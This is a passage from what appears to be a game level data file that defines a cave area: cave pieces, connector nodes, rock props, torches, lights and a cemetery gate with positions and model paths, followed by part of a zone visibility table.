Point3(6.853, -96.042, -9.479),'Scale': VBase3(6.811, 6.811, 12.098),'VisSize': 'Large','VisZone': '1_1235611793.08akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_l'}}},'Pos': Point3(125.0, -625.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611788.39akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow200'}},'1235611794.03akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611794.05akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611794.03akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(25.0, -525.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '2_1235611793.08akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend150_lava'}},'1235611795.0akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611795.02akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611795.0akelts','Pos': Point3(0.0, 0.0, 
0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-200.0, -400.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611784.77akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend100'}},'1235611795.97akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(-90.0, 0.0, 0.0),'Objects': {'1235611795.98akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611795.97akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611804.13akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611795.97akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237584000.0akelts0': {'Type': 'Cemetary','DisableCollision': False,'Holiday': '','Hpr': VBase3(180.0, 0.0, 0.0),'Pos': Point3(1.126, -31.448, 0.0),'Scale': VBase3(1.525, 1.525, 1.525),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cem_gate_english'}},'1237594240.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(24.387, 0.0, 0.0),'Pos': Point3(29.653, -33.939, -6.739),'Scale': VBase3(1.393, 1.393, 1.393),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1237594240.0akelts1': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-171.729, 0.0, 0.0),'Pos': Point3(-26.552, -25.42, -5.106),'Scale': VBase3(1.393, 1.393, 1.393),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1237594240.0akelts2': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-28.797, 0.0, 162.218),'Pos': Point3(-11.732, -37.045, 58.326),'Scale': VBase3(0.9, 0.9, 0.9),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}}},'Pos': Point3(-75.0, -275.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611119.02akelts','Visual': {'Model': 
'models/caves/pir_m_are_cav_hallTransition'}},'1236292864.0akelts': {'Type': 'Light - Dynamic','Attenuation': '0.005','ConeAngle': '60.0000','DropOff': '0.0000','FlickRate': '0.5000','Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Intensity': '1.0000','LightType': 'AMBIENT','Pos': Point3(-11.228, -110.444, 352.706),'Scale': VBase3(22.068, 22.068, 22.068),'VisSize': '','Visual': {'Color': (0.13, 0.29, 0.44, 1.0),'Model': 'models/props/light_tool_bulb'}},'1236293632.0akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(180.0, 0.0, 0.0),'Objects': {'1236293632.0akelts0': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1236293632.0akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1236293632.0akelts1': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1236293632.0akelts','Pos': Point3(0.0, -150.0, 41.991),'Scale': VBase3(1.0, 1.0, 1.0)},'1236294016.0akelts': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(-16.137, -149.339, 43.495),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','VisZone': '1_1236293632.0akelts','Visual': {'Model': 'models/props/torch'}}},'Pos': Point3(525.0, 75.0, 241.991),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1236293632.0akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallNarrowAscend'}},'1236293632.0akelts2': {'Type': 'Cave_Pieces','Hpr': VBase3(180.0, 0.0, 0.0),'Objects': {'1236293632.0akelts3': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1236293632.0akelts2','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237573940.19akelts': {'Type': 'Tunnel Cap','DisableCollision': False,'Holiday': '','Hpr': VBase3(180.0, 0.0, 0.0),'Objects': {'1237573962.13akelts': {'Type': 'Locator Node','Name': 'portal_interior_2','Hpr': Point3(0.0, 0.0, 0.0),'Parent Uid': '1237573940.19akelts','Pos': Point3(-0.303, 
-0.429, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-0.252, -73.084, 3.505),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1236293632.0akelts2','Visual': {'Model': 'models/tunnels/pir_m_are_tun_caveInterior_cap'}}},'Pos': Point3(525.0, 225.0, 283.982),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1236293632.0akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallNarrow75_entrance'}},'1237584256.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-121.45, 0.0, 0.0),'Pos': Point3(-291.061, 183.864, 241.003),'Scale': VBase3(2.636, 2.636, 3.142),'VisSize': 'Large','VisZone': '0_1235611530.73akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_h'}},'1238122156.47kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': VBase3(-174.393, 0.0, 0.0),'Pos': Point3(-165.059, 44.035, 228.291),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/torch'}},'1238122886.85kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(151.984, 0.925, 0.761),'Pos': Point3(-198.959, 227.009, 219.067),'Scale': VBase3(1.965, 1.371, 1.912),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_tall'}},'1238123165.21kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-83.78, 105.396, 201.451),'Scale': VBase3(1.194, 1.194, 1.194),'VisSize': '','Visual': {'Model': 'models/props/torch'}},'1238123307.1kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': VBase3(-149.543, 0.0, 0.0),'Pos': Point3(133.169, 82.732, 200.138),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/torch'}},'1238123315.1kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': VBase3(-62.644, 0.0, 0.0),'Pos': Point3(133.646, 66.069, 200.134),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': 
{'Model': 'models/props/torch'}},'1238124386.78kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(355.282, 299.703, 199.533),'Scale': VBase3(0.674, 0.674, 0.674),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_stite_sml'}}},'Visibility': 'Grid','Visual': {'Model': 'models/misc/pir_m_are_cav_startingPlane'}}},'Vis Table': {'0_1235611035.98akelts': ([], ['1235611119.33akelts', '1235611119.91akelts', '1235611035.98akelts', '1235611121.0akelts', '1235611792.13akelts', '1235611117.31akelts', '1235611120.45akelts', '1235611519.63akelts', '1237588864.0akelts', '1237584512.0akelts', '1237594368.0akelts', '1237574022.48akelts', '1235611119.02akelts', '1237590784.0akelts', '1235611061.09akelts', '1237588608.0akelts', '1237590912.0akelts', '1237588864.0akelts0', '1237582208.0akelts'], []),'0_1235611061.09akelts': ([], ['1235611035.98akelts', '1235611119.33akelts', '1235611119.91akelts', '1235611119.02akelts', '1235611117.05akelts', '1235611061.09akelts', '1235611792.13akelts', '1235611121.0akelts', '1235611117.31akelts', '1237574022.48akelts', '1237594368.0akelts', '1237574300.08akelts', '1237584512.0akelts', '1237588864.0akelts', '1237588608.0akelts', '1235611120.45akelts'], []),'0_1235611115.91akelts': ([], ['1235611115.91akelts', '1235611116.59akelts', '1235611121.0akelts', '1237573872.64akelts'], []),'0_1235611116.59akelts': ([], ['1235611115.91akelts', '1235611116.59akelts'], []),'0_1235611117.05akelts': ([], ['1235611117.05akelts', '1235611035.98akelts', '1237574300.08akelts', '1235611061.09akelts', '1235611121.0akelts', '1237588608.0akelts', '1237574022.48akelts', '1237594240.0akelts1', '1237590784.0akelts', '1235611119.02akelts', '1237594240.0akelts0', '1237584000.0akelts0', '1235611795.97akelts', '1237594368.0akelts', '1235611117.69akelts', '1237582208.0akelts', '1235611119.33akelts'], []),'0_1235611117.31akelts': ([], ['1237574022.48akelts', '1235611117.31akelts', '1235611121.0akelts', 
'1237574300.08akelts', '1235611035.98akelts', '1235611061.09akelts', '1237588608.0akelts', '1235611117.05akelts', '1237590784.0akelts', '1237594368.0akelts', '1235611117.69akelts', '1235611119.02akelts', '1237594240.0akelts1'], []),'0_1235611117.69akelts': ([], ['1235611117.69akelts', '1236293632.0akelts', '1236293632.0akelts2', '1237573940.19akelts', '1235611117.31akelts'], []),'0_1235611119.02akelts': ([], ['1235611119.02akelts', '1235611035.98akelts', '1236212352.0akelts2', '1235611792.13akelts', '1236212352.0akelts3', '1235611117.31akelts', '1235611117.05akelts', '1237590784.0akelts', '1237574300.08akelts', '1237574022.48akelts', '1235611061.09akelts', '1235611119.33akelts', '1237590912.0akelts', '1237582208.0akelts', '1237594240.0akelts0', '1237584000.0akelts0', '1235611795.97akelts', '1237594240.0akelts1', '1237594240.0akelts2', '1237582592.0akelts0', '1235611775.94akelts', '1237594112.0akelts0'], []),'0_1235611119.33akelts': ([], ['1237588864.0akelts', '1235611120.45akelts', '1237584512.0akelts', '1237588864.0akelts0', '1235611119.33akelts', '1237574300.08akelts', '1235611119.02akelts', '1237574022.48akelts', '1237590784.0akelts', '1237582208.0akelts', '1235611061.09akelts', '1235611121.0akelts', '1237590912.0akelts', '1235611519.63akelts', '1237591040.0akelts', '1235611530.08akelts', '1235611792.13akelts'], []),'0_1235611119.91akelts': ([], ['1235611120.45akelts', '1237584512.0akelts', '1237588864.0akelts0', '1235611119.91akelts', '1237588864.0akelts', '1235611119.33akelts', '1235611519.63akelts', '1237591040.0akelts', '1235611530.08akelts', '1237590912.0akelts', '1235611035.98akelts', '1235611061.09akelts', '1237574022.48akelts', '1237574300.08akelts', '1237590784.0akelts'], []),'0_1235611120.45akelts': ([], ['1235611361.5akelts', '1235611119.91akelts', '1237588864.0akelts0', '1235611534.09akelts', '1237827221.59akelts', '1237827053.79akelts', '1235611352.94akelts', '1237827026.68akelts', '1237827104.49akelts', '1237827147.39akelts', '1237827576.62akelts', 
'1237827472.21akelts', '1235611347.08akelts'], []),'0_1235611121.0akelts': ([], ['1235611061.09akelts', '1235611115.91akelts', '1235611035.98akelts', '1235611121.0akelts', '1237574022.48akelts'], []),'0_1235611344.81akelts': ([], ['1235611353.63akelts', '1237827546.46akelts', '1237827026.68akelts', '1237827472.21akelts', '1235611352.94akelts', '1237827511.65akelts'], []),'0_1235611347.08akelts': ([], ['1235611347.08akelts', '1235611348.2akelts', '1237827026.68akelts', '1237827221.59akelts', '1235611352.94akelts', '1235611361.5akelts', '1237827576.62akelts', '1235611120.45akelts'], []),'0_1235611348.2akelts': ([], ['1235611348.83akelts', '1235611348.2akelts', '1235611347.08akelts', '1237827576.62akelts', '1235611361.5akelts', '1237827026.68akelts'], []),'0_1235611348.83akelts': ([], ['1235611348.2akelts', '1235611347.08akelts'], []),'0_1235611352.23akelts': ([], ['1235611353.63akelts', '1237827546.46akelts', '1237827511.65akelts'], []),'0_1235611352.94akelts': ([], ['1235611344.81akelts', '1237827472.21akelts', '1235611353.63akelts', '1235611352.94akelts', '1237827511.65akelts', '1237827053.79akelts', '1235611534.09akelts', '1237827026.68akelts', '1235611361.5akelts', '1237827221.59akelts', '1235611120.45akelts', '1237827147.39akelts'], []),'0_1235611353.63akelts': ([], ['1237827546.46akelts', '1235611344.81akelts', '1237827472.21akelts', '1235611352.94akelts', '1237827026.68akelts', '1235611353.63akelts', '1237827511.65akelts', '1235611352.23akelts'], []),'0_1235611361.5akelts': ([], ['1235611348.2akelts', '1235611361.5akelts', '1237827576.62akelts', '1237827147.39akelts', '1235611120.45akelts', '1235611534.09akelts', '1237827221.59akelts', '1237827026.68akelts', '1235611352.94akelts', '1237827053.79akelts', '1237827104.49akelts', '1237827472.21akelts'], []),'0_1235611519.63akelts': ([], ['1235611119.33akelts', '1235611530.08akelts', '1237590912.0akelts', '1237591040.0akelts', '1235611119.91akelts', '1237588864.0akelts', '1235611120.45akelts', '1237584512.0akelts', 
'1237588864.0akelts0', '1235611035.98akelts', '1237574300.08akelts'], []),'0_1235611528.14akelts': ([], ['1237595008.0akelts', '1237595136.0akelts', '1237584384.0akelts0', '1235611528.78akelts', '1235611534.09akelts', '1237827104.49akelts', '1237584384.0akelts', '1235611529.42akelts', '1235611746.08akelts'], []),'0_1235611528.78akelts': ([], ['1237584384.0akelts', '1235611746.08akelts', '1235611528.78akelts', '1237595008.0akelts', '1235611528.14akelts', '1237584384.0akelts0', '1237595136.0akelts'], []),'0_1235611529.42akelts': ([], ['1235611529.42akelts', '1237584384.0akelts', '1235611746.08akelts', '1235611528.78akelts', '1237595008.0akelts', '1235611528.14akelts', '1237595136.0akelts', '1237584384.0akelts0', '1235611533.41akelts', '1235611532.06akelts', '1235611532.73akelts', '1237828412.73akelts'], []),'0_1235611530.08akelts': ([], ['1235611530.08akelts', '1235611530.73akelts', '1237591040.0akelts', '1235611519.63akelts', '1235611531.39akelts', '1237584256.0akelts', '1237584256.0akelts0', '1237584256.0akelts1', '1237587968.0akelts'], []),'0_1235611530.73akelts': ([], ['1235611530.08akelts', '1235611530.73akelts', '1237587968.0akelts', '1235611531.39akelts', '1237584256.0akelts', '1237584256.0akelts1', '1237591040.0akelts', '1235611519.63akelts'], []),'0_1235611531.39akelts': ([], ['1237584256.0akelts0', '1237584256.0akelts', '1235611530.73akelts', '1235611531.39akelts', '1235611530.08akelts', '1235611532.73akelts', '1235611533.41akelts', '1237584256.0akelts1', '1237828366.56akelts', '1237828348.45akelts'], []),'0_1235611532.06akelts': ([], ['1235611531.39akelts', '1235611530.73akelts', '1237584256.0akelts1', '1235611532.06akelts', '1235611533.41akelts', '1235611746.08akelts', '1235611529.42akelts', '1235611532.73akelts', '1237584256.0akelts', '1237828366.56akelts', '1237828412.73akelts', '1237828348.45akelts'], []),'0_1235611532.73akelts': ([], ['1235611532.06akelts', '1235611533.41akelts', '1235611746.08akelts', '1235611531.39akelts', '1235611532.73akelts', 
'1235611530.73akelts', '1237828412.73akelts', '1235611529.42akelts', '1237828366.56akelts', '1237828348.45akelts'], []),'0_1235611533.41akelts': ([], ['1235611532.73akelts', '1235611532.06akelts', '1237828412.73akelts', '1235611746.08akelts', '1235611529.42akelts', '1237584384.0akelts', '1237828366.56akelts', '1237828348.45akelts'], []),'0_1235611534.09akelts': ([], ['1235611534.09akelts', '1235611528.14akelts', '1237827104.49akelts', '1235611352.94akelts', '1237827026.68akelts', '1237827053.79akelts', '1235611361.5akelts', '1237827221.59akelts', '1237827576.62akelts', '1235611120.45akelts', '1237827472.21akelts', '1237827147.39akelts', '1235611344.81akelts'], []),'0_1235611746.08akelts': ([], ['1235611533.41akelts', '1235611528.78akelts', '1237584384.0akelts', '1235611529.42akelts', '1237595136.0akelts', '1235611532.06akelts', '1237828412.73akelts'], []),'0_1235611775.94akelts': ([], ['1237593984.0akelts1', '1237593984.0akelts', '1235611782.08akelts', '1237593984.0akelts0', '1235611795.97akelts', '1237594112.0akelts0', '1235611777.48akelts', '1235611787.47akelts'], []),'0_1235611777.48akelts': ([], ['1237594112.0akelts', '1235611781.22akelts', '1235611795.0akelts', '1235611784.77akelts', '1237593984.0akelts1', '1237593984.0akelts', '1237593984.0akelts0'], []),'0_1235611781.22akelts': ([], ['1235611781.22akelts', '1235611777.48akelts', '1237594112.0akelts', '1235611784.77akelts', '1237593984.0akelts1', '1235611787.47akelts', '1235611775.94akelts', '1235611795.0akelts'], []),'0_1235611782.08akelts': ([], ['1237583872.0akelts', '1235611789.31akelts', '1237584000.0akelts', '1237593600.0akelts', '1237593728.0akelts', '1235611783.0akelts', '1235611788.39akelts', '1237593856.0akelts0', '1235611786.56akelts', '1235611787.47akelts', '1235611783.89akelts', '1237583872.0akelts0'], []),'0_1235611783.0akelts': ([], ['1235611785.67akelts', '1235611783.89akelts', '1235611782.08akelts', '1237583872.0akelts', '1237593856.0akelts0', '1237593728.0akelts', '1237584000.0akelts', 
'1235611786.56akelts', '1235611788.39akelts', '1235611793.08akelts', '1237583872.0akelts0'], []),'0_1235611783.89akelts': ([], ['1235611783.0akelts', '1237593856.0akelts0', '1237593728.0akelts', '1237584000.0akelts', '1237583872.0akelts'], []),'0_1235611784.77akelts': ([], ['1237593984.0akelts', '1235611782.08akelts', '1235611777.48akelts', '1235611781.22akelts', '1237594112.0akelts', '1235611787.47akelts', '1237593984.0akelts1'], []),'0_1235611785.67akelts': ([], ['1235611783.89akelts', '1235611785.67akelts', '1235611783.0akelts', '1237583872.0akelts0', '1237593856.0akelts0', '1237584000.0akelts', '1237593728.0akelts'], []),'0_1235611786.56akelts': ([], ['1235611788.39akelts', '1235611789.31akelts', '1237593600.0akelts', '1235611793.08akelts', '1237583872.0akelts', '1235611782.08akelts', '1237584000.0akelts', '1237593728.0akelts', '1237593856.0akelts0', '1235611783.0akelts', '1236212480.0akelts1'], []),'0_1235611787.47akelts': ([], ['1235611777.48akelts', '1235611784.77akelts', '1235611795.0akelts', '1237594112.0akelts', '1235611787.47akelts', '1237593984.0akelts1', '1235611775.94akelts', '1237593984.0akelts', '1235611782.08akelts', '1237593984.0akelts0', '1235611781.22akelts'], []),'0_1235611788.39akelts': ([], ['1235611793.08akelts', '1237583744.0akelts', '1236212480.0akelts1', '1235611794.03akelts', '1235611789.31akelts', '1237593600.0akelts', '1235611788.39akelts', '1235611786.56akelts', '1237593728.0akelts', '1235611783.0akelts', '1237584000.0akelts', '1237593856.0akelts0', '1235611782.08akelts'], []),'0_1235611789.31akelts': ([], ['1235611789.31akelts', '1235611788.39akelts', '1235611786.56akelts', '1237593600.0akelts', '1235611791.19akelts', '1235611790.25akelts', '1236212352.0akelts4', '1237583616.0akelts', '1237583616.0akelts0'], []),'0_1235611790.25akelts': ([], ['1236212352.0akelts4', '1237583616.0akelts', '1237583616.0akelts0', '1235611790.25akelts', '1235611791.19akelts', '1235611789.31akelts', '1237593600.0akelts', '1235611788.39akelts', 
'1235611792.13akelts'], []),'0_1235611791.19akelts': ([], ['1235611792.13akelts', '1236212352.0akelts4', '1237583616.0akelts0', '1237583616.0akelts', '1235611789.31akelts', '1236212352.0akelts2', '1236212352.0akelts3', '1237582592.0akelts0', '1237582592.0akelts'], []),'0_1235611792.13akelts': ([], ['1237582592.0akelts', '1236212352.0akelts3', '1237582592.0akelts0', '1235611119.02akelts', '1236212352.0akelts2', '1235611795.97akelts', '1237582208.0akelts', '1237594240.0akelts0', '1236212352.0akelts4', '1235611791.19akelts', '1237583616.0akelts0', '1235611790.25akelts', '1237583616.0akelts'], []),'0_1235611793.08akelts': ([], ['1235611793.08akelts', '1237583744.0akelts', '1237593600.0akelts', '1235611788.39akelts', '1235611789.31akelts', '1235611786.56akelts', '1235611794.03akelts'], []),'0_1235611794.03akelts': ([], ['1235611794.03akelts', '1237583744.0akelts', '1235611793.08akelts', '1236212480.0akelts1', '1235611788.39akelts'], []),'0_1235611795.0akelts': ([], ['1235611795.0akelts', '1235611784.77akelts', '1235611777.48akelts', '1237593984.0akelts', '1235611782.08akelts', '1235611787.47akelts'], []),'0_1235611795.97akelts': ([], ['1235611795.97akelts', '1237594240.0akelts1', '1237584000.0akelts0', '1235611775.94akelts', '1237594112.0akelts0', '1237594240.0akelts0', '1235611119.02akelts', '1237582208.0akelts', '1236212352.0akelts2', '1235611792.13akelts', '1237582592.0akelts0', '1236212352.0akelts3', '1235611791.19akelts', '1235611117.05akelts', '1235611035.98akelts', '1237590784.0akelts', '1237574300.08akelts'], []),'0_1236293632.0akelts': ([], ['1236293632.0akelts2', '1237573940.19akelts'], []),'0_1236293632.0akelts2': ([], ['1236293632.0akelts2', '1236293632.0akelts', '1235611117.69akelts'], []),'1_1235611035.98akelts': ([], ['1235611035.98akelts', '1235611117.31akelts', '1235611117.05akelts', '1235611119.91akelts', '1235611119.33akelts', '1235611061.09akelts', '1235611121.0akelts', '1235611119.02akelts', '1235611792.13akelts', '1237588608.0akelts', 
'1237590912.0akelts', '1237574300.08akelts', '1237594368.0akelts', '1237588864.0akelts', '1237584512.0akelts', '1237590784.0akelts'], []),'1_1235611061.09akelts': ([], ['1235611035.98akelts', '1235611061.09akelts', '1235611119.91akelts', '1235611121.0akelts', '1235611792.13akelts', '1235611117.05akelts', '1235611117.31akelts', '1237574022.48akelts', '1237594368.0akelts', '1237574300.08akelts', '1237588608.0akelts', '1237588864.0akelts', '1237584512.0akelts', '1235611115.91akelts', '1235611119.33akelts', '1235611119.02akelts', '1235611120.45akelts'], []),'1_1235611115.91akelts': ([], ['1235611115.91akelts', '1235611116.59akelts', '1235611121.0akelts', '1235611035.98akelts', '1235611061.09akelts', '1237573872.64akelts', '1237588608.0akelts'], []),'1_1235611117.05akelts': ([], ['1235611117.05akelts', '1237594240.0akelts1', '1235611035.98akelts', '1235611119.02akelts', '1237590784.0akelts', '1237574022.48akelts', '1235611061.09akelts', '1235611121.0akelts', '1237588608.0akelts', '1237574300.08akelts', '1235611117.31akelts', '1237594368.0akelts', '1235611117.69akelts', '1235611795.97akelts', '1237594240.0akelts0', '1237584000.0akelts0'], []),'1_1235611117.31akelts': ([], ['1237594368.0akelts', '1235611035.98akelts', '1237574022.48akelts', '1235611117.05akelts', '1237574300.08akelts', '1235611117.69akelts', '1235611117.31akelts', '1235611061.09akelts', '1235611121.0akelts', '1237590784.0akelts', '1237588608.0akelts'], []),'1_1235611117.69akelts': ([], ['1235611117.69akelts', '1235611117.31akelts', '1236293632.0akelts', '1237573940.19akelts', '1236293632.0akelts2', '1237594368.0akelts'], []),'1_1235611119.02akelts': ([], ['1237594112.0akelts0', '1237584000.0akelts0', '1237594240.0akelts0', '1235611775.94akelts', '1237594240.0akelts1', '1237594240.0akelts2', '1237590784.0akelts', '1235611117.05akelts', '1235611119.02akelts', '1235611035.98akelts', '1237582208.0akelts', '1237574022.48akelts', '1237574300.08akelts', '1235611119.33akelts', '1236212352.0akelts2', 
'1235611792.13akelts', '1237582592.0akelts0', '1236212352.0akelts3', '1235611117.31akelts'], []),'1_1235611119.33akelts': ([], ['1237584512.0akelts', '1235611120.45akelts', '1237588864.0akelts', '1235611119.91akelts', '1237588864.0akelts0', '1235611119.33akelts', '1237574300.08akelts', '1237574022.48akelts', '1235611061.09akelts', '1235611035.98akelts', '1237590784.0akelts', '1235611119.02akelts', '1235611519.63akelts', '1235611530.08akelts', '1237591040.0akelts', '1237590912.0akelts'], []),'1_1235611119.91akelts': ([], ['1237588864.0akelts', '1235611120.45akelts', '1237588864.0akelts0', '1237584512.0akelts', '1235611119.91akelts', '1237591040.0akelts', '1235611119.33akelts', '1237590912.0akelts', '1235611519.63akelts', '1235611530.08akelts', '1235611061.09akelts', '1235611035.98akelts', '1235611121.0akelts'], []),'1_1235611120.45akelts': ([], ['1235611120.45akelts', '1237588864.0akelts', '1235611119.91akelts', '1235611519.63akelts', '1237590912.0akelts', '1237588864.0akelts0', '1235611119.33akelts', '1237584512.0akelts', '1235611530.08akelts', '1237591040.0akelts', '1235611035.98akelts', '1235611361.5akelts', '1237827147.39akelts', '1237827026.68akelts', '1237827221.59akelts', '1237827053.79akelts', '1237827104.49akelts', '1235611534.09akelts', '1235611352.94akelts', '1237827576.62akelts', '1237827472.21akelts'], []),'1_1235611121.0akelts': ([], ['1235611121.0akelts', '1235611061.09akelts', '1235611117.05akelts', '1235611119.02akelts', '1235611119.33akelts', '1235611792.13akelts', '1235611119.91akelts', '1235611035.98akelts', '1235611115.91akelts', '1235611117.31akelts', '1237574022.48akelts', '1237574300.08akelts', '1237594368.0akelts', '1237588608.0akelts', '1237584512.0akelts', '1235611120.45akelts', '1237588864.0akelts'], []),'1_1235611344.81akelts': ([], ['1235611344.81akelts', '1235611353.63akelts', '1237827511.65akelts', '1237827546.46akelts', '1237827026.68akelts', '1237827472.21akelts', '1235611352.94akelts', '1237827053.79akelts', '1235611534.09akelts'], 
[]),'1_1235611347.08akelts': ([], ['1235611347.08akelts', '1237827026.68akelts', '1235611361.5akelts', '1237827576.62akelts', '1237827221.59akelts', '1235611348.83akelts'], []),'1_1235611348.2akelts': ([], ['1235611348.2akelts', '1235611347.08akelts', '1235611361.5akelts', '1237827576.62akelts', '1237827026.68akelts', '1235611348.83akelts'], []),'1_1235611352.94akelts': ([], ['1237827026.68akelts', '1237827104.49akelts', '1235611534.09akelts', '1235611352.94akelts', '1237827053.79akelts', '1237827472.21akelts', '1235611120.45akelts', '1237827147.39akelts', '1237827576.62akelts', '1235611361.5akelts', '1235611347.08akelts', '1235611528.14akelts', '1235611344.81akelts', '1235611353.63akelts', '1237827511.65akelts'], []),'1_1235611353.63akelts': ([], ['1235611352.23akelts', '1237827511.65akelts', '1235611353.63akelts', '1235611344.81akelts', '1237827472.21akelts', '1235611352.94akelts'], []),'1_1235611361.5akelts': ([], ['1235611361.5akelts', '1235611120.45akelts', '1235611352.94akelts', '1237827147.39akelts', '1237827026.68akelts', '1237827053.79akelts', '1237827221.59akelts', '1235611534.09akelts', '1237827104.49akelts', '1235611528.14akelts', '1237827472.21akelts', '1237827576.62akelts', '1235611347.08akelts'], []),'1_1235611519.63akelts': ([], ['1235611530.08akelts', '1237591040.0akelts', '1235611519.63akelts', '1235611119.33akelts', '1237590912.0akelts', '1235611119.91akelts', '1237588864.0akelts0', '1235611120.45akelts', '1237588864.0akelts', '1237584512.0akelts', '1235611530.73akelts'], []),'1_1235611528.14akelts': ([], ['1235611528.14akelts', '1237827104.49akelts', '1235611352.94akelts', '1237827053.79akelts', '1237827026.68akelts', '1235611534.09akelts', '1237827221.59akelts', '1235611528.78akelts', '1237595136.0akelts', '1237584384.0akelts0', '1235611529.42akelts', '1237595008.0akelts'], []),'1_1235611528.78akelts': ([], ['1237595008.0akelts', '1237584384.0akelts', '1235611746.08akelts', '1235611529.42akelts', '1235611528.78akelts', '1237584384.0akelts0', 
'1237595136.0akelts', '1235611528.14akelts'], []),'1_1235611529.42akelts': ([], ['1237584384.0akelts', '1235611529.42akelts', '1235611528.78akelts', '1237595008.0akelts', '1235611528.14akelts', '1237584384.0akelts0', '1237595136.0akelts', '1235611746.08akelts', '1235611533.41akelts', '1235611532.73akelts', '1235611532.06akelts', '1237828412.73akelts'], []),'1_1235611530.08akelts': ([], ['1237591040.0akelts', '1235611530.08akelts', '1237584256.0akelts0', '1235611530.73akelts', '1237587968.0akelts', '1237584256.0akelts', '1237584256.0akelts1', '1235611519.63akelts', '1235611119.33akelts', '1235611119.91akelts', '1237590912.0akelts', '1237584512.0akelts', '1237588864.0akelts0', '1237588864.0akelts', '1235611120.45akelts'], []),'1_1235611530.73akelts': ([], ['1235611530.73akelts', '1235611531.39akelts', '1235611519.63akelts', '1235611530.08akelts', '1237584256.0akelts', '1237584256.0akelts0', '1235611532.06akelts', '1237828366.56akelts', '1237828348.45akelts', '1237584256.0akelts1', '1237587968.0akelts'], []),'1_1235611531.39akelts': ([], ['1235611531.39akelts', '1237584256.0akelts1', '1235611530.73akelts', '1237584256.0akelts', '1235611532.73akelts', '1235611532.06akelts', '1235611533.41akelts', '1235611530.08akelts', '1237584256.0akelts0', '1237828366.56akelts', '1237828348.45akelts'], []),'1_1235611532.06akelts': ([], ['1235611532.06akelts', '1237584256.0akelts1', '1235611531.39akelts', '1235611530.73akelts', '1235611746.08akelts', '1235611533.41akelts', '1237828412.73akelts', '1237828348.45akelts', '1237828366.56akelts', '1235611529.42akelts'], 